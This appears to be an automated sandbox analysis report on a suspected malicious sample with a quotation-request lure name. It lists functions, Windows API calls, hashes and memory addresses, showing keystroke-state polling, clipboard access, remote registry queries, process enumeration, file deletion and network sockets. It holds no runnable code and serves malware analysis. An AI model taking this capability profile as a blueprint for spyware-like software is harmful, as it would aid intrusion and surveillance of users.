                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            • Opcode ID: 26d40b820e24ebd73d381c2d3bdc98302e331be1d2078c49f236013c9edf4392
                                                            • Instruction ID: 2ec50c8f2c19355d0c40c9179b3d403d68a1c93ff38275fb0c67efe306404125
                                                            • Opcode Fuzzy Hash: 26d40b820e24ebd73d381c2d3bdc98302e331be1d2078c49f236013c9edf4392
                                                            • Instruction Fuzzy Hash: 95724071E04219DBDB28CF98D8817EEB7B5FF88310F14416AE915EB281DB749E81DB90
                                                            APIs
                                                              • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                              • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                            • _wcscat.LIBCMT ref: 007F6441
                                                            • __wsplitpath.LIBCMT ref: 007F645F
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 007F6474
                                                            • _wcscpy.LIBCMT ref: 007F64A3
                                                            • _wcscat.LIBCMT ref: 007F64B8
                                                            • _wcscat.LIBCMT ref: 007F64CA
                                                            • DeleteFileW.KERNEL32(?), ref: 007F64DA
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F64EB
                                                            • FindClose.KERNEL32(00000000), ref: 007F6506
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                            • String ID: \*.*
                                                            • API String ID: 2643075503-1173974218
                                                            • Opcode ID: 6091b9a25de45528fb587853f68dcecfeb33502ed6187efb0307b6c19aba7459
                                                            • Instruction ID: ad5a280189c27ad8a5b4283dce76648fce8addf29b8d5048e952dafb5071a756
                                                            • Opcode Fuzzy Hash: 6091b9a25de45528fb587853f68dcecfeb33502ed6187efb0307b6c19aba7459
                                                            • Instruction Fuzzy Hash: 9C314BB2409388AEC721EBA488899EF77EC6F55310F44491AF6D9C3241EA39D50987A7
                                                            APIs
                                                              • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0081328E
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0081332D
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008133C5
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00813604
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00813611
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: a2e4356c6c26d6f1161bca2123fbed19f08aedc96b8e94f528e3aba211d96542
                                                            • Instruction ID: 8e30ed381af204329e4e69a8876a5a79d82cb81c4e2a542552870e04e2d32247
                                                            • Opcode Fuzzy Hash: a2e4356c6c26d6f1161bca2123fbed19f08aedc96b8e94f528e3aba211d96542
                                                            • Instruction Fuzzy Hash: 82E15A31204200EFCB15DF28C995EAABBE9FF88714F04896DF54ADB261DB34E945CB52
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 007F2B5F
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 007F2BE0
                                                            • GetKeyState.USER32(000000A0), ref: 007F2BFB
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 007F2C15
                                                            • GetKeyState.USER32(000000A1), ref: 007F2C2A
                                                            • GetAsyncKeyState.USER32(00000011), ref: 007F2C42
                                                            • GetKeyState.USER32(00000011), ref: 007F2C54
                                                            • GetAsyncKeyState.USER32(00000012), ref: 007F2C6C
                                                            • GetKeyState.USER32(00000012), ref: 007F2C7E
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 007F2C96
                                                            • GetKeyState.USER32(0000005B), ref: 007F2CA8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 6628917f01ea60817f3cd333edc9f5ffe42ea81910880f0e649640e3b6859e26
                                                            • Instruction ID: 87299855103663aa48003f317b131209d4079c371cd0242163749ec4681c072e
                                                            • Opcode Fuzzy Hash: 6628917f01ea60817f3cd333edc9f5ffe42ea81910880f0e649640e3b6859e26
                                                            • Instruction Fuzzy Hash: BC4191746047CE69FF359B6488043B9BEA0AB11354F048459DBC6563C3EBAC99C9C7B2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: d92ebc79c5a9ac4b2d53cd7f95fa1551b33d8e18c4d77f8873f26a50929e31fe
                                                            • Instruction ID: c4cfbc510592dd242cabdbc9dcebf7d9f72ebec0cf2724055efb95eb6d9d5ca8
                                                            • Opcode Fuzzy Hash: d92ebc79c5a9ac4b2d53cd7f95fa1551b33d8e18c4d77f8873f26a50929e31fe
                                                            • Instruction Fuzzy Hash: 62219F31300614DFDB11AF64EC4AF2E77A8FF54710F04841AF91ADB2A1EB75E8218B90
                                                            APIs
                                                              • Part of subcall function 007E9ABF: CLSIDFromProgID.OLE32 ref: 007E9ADC
                                                              • Part of subcall function 007E9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 007E9AF7
                                                              • Part of subcall function 007E9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 007E9B05
                                                              • Part of subcall function 007E9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 007E9B15
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0080C235
                                                            • _memset.LIBCMT ref: 0080C242
                                                            • _memset.LIBCMT ref: 0080C360
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0080C38C
                                                            • CoTaskMemFree.OLE32(?), ref: 0080C397
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 0080C3E5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            • Opcode ID: d437d0260f97f128f4e9d4b6387a48e5ece98306d8a24fb80c46723952bfbc8e
                                                            • Instruction ID: 2bcf291ea158996e8a1a363690e4613cda3adab42f68c151502503324cf9ce1a
                                                            • Opcode Fuzzy Hash: d437d0260f97f128f4e9d4b6387a48e5ece98306d8a24fb80c46723952bfbc8e
                                                            • Instruction Fuzzy Hash: CC911871D00218EBDB10DF94DC95EDEBBB9FF48710F10812AE515A7281EB746A45CFA0
                                                            APIs
                                                              • Part of subcall function 007EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                              • Part of subcall function 007EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                              • Part of subcall function 007EB134: GetLastError.KERNEL32 ref: 007EB1BA
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 007F7A0F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: 671209a454b3eae9ce43f022be2a6ec768d8a84d495dea25e18f3cdd03192423
                                                            • Instruction ID: 7dd424496a01bc103b46ba392988b8e3af6016d7cd78f42369ee2fda0e060b96
                                                            • Opcode Fuzzy Hash: 671209a454b3eae9ce43f022be2a6ec768d8a84d495dea25e18f3cdd03192423
                                                            • Instruction Fuzzy Hash: 6F01F771659319AAF72C567CDC5FFBF3258AB04750F268824FB13E22D2E9AD5E00C1A0
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00808CA8
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00808CB7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00808CD3
                                                            • listen.WSOCK32(00000000,00000005), ref: 00808CE2
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00808CFC
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00808D10
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: a4cb58cebd98d1a4e1b4d55312dc7256abf3f304aa3401f87b7e1b4b4f78fc81
                                                            • Instruction ID: be7723ffb9eeb9ad6b887b61eaf395b1c7f24e2a72966310d83086f0c1bea2db
                                                            • Opcode Fuzzy Hash: a4cb58cebd98d1a4e1b4d55312dc7256abf3f304aa3401f87b7e1b4b4f78fc81
                                                            • Instruction Fuzzy Hash: 6C21D031600204EFCB60AF28DD49B6EB7A9FF48314F108558F956E73D2CB74AD418B61
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007F6583
                                                            • __wsplitpath.LIBCMT ref: 007F65A7
                                                            • _wcscat.LIBCMT ref: 007F65BA
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007F65F9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                            • String ID:
                                                            • API String ID: 1605983538-0
                                                            • Opcode ID: a9be11aa4aece8d2f58e9fcd767856517e914a3e43574ae2537887830257c9de
                                                            • Instruction ID: e9971ac353388e80e530e5a56c04ed5212affa2adccdd4463a43774a9962dd6a
                                                            • Opcode Fuzzy Hash: a9be11aa4aece8d2f58e9fcd767856517e914a3e43574ae2537887830257c9de
                                                            • Instruction Fuzzy Hash: 0421877190021CEBDB10ABA4DD88FEDB7BCAB45300F5004A5F605E7241EB759F95CB60
                                                            APIs
                                                              • Part of subcall function 0080A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00809296
                                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008092B9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: 06422c42cf867723c500334ead9563d8cd3586206520b330d76fb1e7b3c99268
                                                            • Instruction ID: f71ecc390c418bea2128311aa65ba1fea2618780379eeffc3029c61aedd01ae9
                                                            • Opcode Fuzzy Hash: 06422c42cf867723c500334ead9563d8cd3586206520b330d76fb1e7b3c99268
                                                            • Instruction Fuzzy Hash: 42418C70600204AFDB14AB688C4AF7EB7E9EF44724F14445CFA56EB2D2DA789D018B91
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 007FEB8A
                                                            • _wcscmp.LIBCMT ref: 007FEBBA
                                                            • _wcscmp.LIBCMT ref: 007FEBCF
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 007FEBE0
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007FEC0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 2387731787-0
                                                            • Opcode ID: 326519e106fbe944634f426f1dc3c7b12a11659903e6044711acb53abacbef7b
                                                            • Instruction ID: efb8bd4a3d095d7bc49630a1105eb3165c09a19f85ab41b84099f4c20ab9ef99
                                                            • Opcode Fuzzy Hash: 326519e106fbe944634f426f1dc3c7b12a11659903e6044711acb53abacbef7b
                                                            • Instruction Fuzzy Hash: CC41BB35604306DFC718DF28C490EAAB7E5FF49320F10455EFA5A8B3A1DB39A940CBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 3de158d83e8109fac0bcbd32118887dd76a22fdd7d1bbd41cf6850516855ea62
                                                            • Instruction ID: 2915c7030a7692783829f092d2789b89a3e63d6b57f7a973d76c535476fec2ff
                                                            • Opcode Fuzzy Hash: 3de158d83e8109fac0bcbd32118887dd76a22fdd7d1bbd41cf6850516855ea62
                                                            • Instruction Fuzzy Hash: 8E119332300215EBE7211F26EC46FAE779CFF94760B040819F845D7241CF34D98386A4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: b7d4d61a0ecfc12281dd18e03736baf58143f0d619d12966aef2997e09ecafbe
                                                            • Instruction ID: ac218a6233dcde0b73bc6fb867cc811ebb613fc7ea9b3af9cec11da7f6e52015
                                                            • Opcode Fuzzy Hash: b7d4d61a0ecfc12281dd18e03736baf58143f0d619d12966aef2997e09ecafbe
                                                            • Instruction Fuzzy Hash: 38926C71E0021ADBDF24DF58C8907EDB7B1FB94314F14819AEA16EB280E7789D81DB91
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,007CE014,771B0AE0,007CDEF1,0084DC38,?,?), ref: 007CE02C
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007CE03E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: fc393dc6add0a2798de8651423b94884b46bcca9738949b15b6c800d7dcefd1d
                                                            • Instruction ID: 3d1cf6445ec601a5f25c9b9eb19e87e38ea534caa124357ad857f3d2458a57e2
                                                            • Opcode Fuzzy Hash: fc393dc6add0a2798de8651423b94884b46bcca9738949b15b6c800d7dcefd1d
                                                            • Instruction Fuzzy Hash: 5DD0C770500B129FD7315F65FC09B56B7D4FB44711F29886EE495D2250D7BCD8C08B90
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007F13DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: d1c20f058a4878337f6550d33f471a43438a04d35e3f1d6158ac9be29abac2bc
                                                            • Instruction ID: 3aab32f131236b6e393aed3df1d0799461838a94a958a8e056d5790216e42a0f
                                                            • Opcode Fuzzy Hash: d1c20f058a4878337f6550d33f471a43438a04d35e3f1d6158ac9be29abac2bc
                                                            • Instruction Fuzzy Hash: 09321375A00609DFC728CF69C480A6AB7F0FF88320B51C46EE59ADB3A1E774E941CB40
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 007CB22F
                                                              • Part of subcall function 007CB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 007CB5A5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Proc$LongWindow
                                                            • String ID:
                                                            • API String ID: 2749884682-0
                                                            • Opcode ID: 5c315f24ed2bb194e7c9290fad2e74843cbacee1103e24142d9ff1121a119e54
                                                            • Instruction ID: 7fb6ec01547cbbc4b2888fb9259fca092b150a11e800d0fb1a9ff279bea94227
                                                            • Opcode Fuzzy Hash: 5c315f24ed2bb194e7c9290fad2e74843cbacee1103e24142d9ff1121a119e54
                                                            • Instruction Fuzzy Hash: 30A13360114119BAEB28AE2E6C8FFBF3B5CFB92344F14411DF906D6592DB2CDC809676
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008043BF,00000000), ref: 00804FA6
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00804FD2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
